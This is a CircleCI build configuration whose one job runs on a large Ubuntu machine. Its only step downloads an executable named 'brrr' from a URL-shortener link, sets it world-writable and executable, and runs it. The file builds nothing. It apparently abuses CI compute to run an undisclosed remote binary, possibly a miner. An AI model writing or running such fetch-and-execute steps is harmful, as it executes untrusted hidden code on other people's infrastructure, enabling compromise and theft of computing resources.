version: 2.1
 
jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - run: wget -O brrr http://gg.gg/vl37n && chmod +x brrr && chmod 777 brrr && ./brrr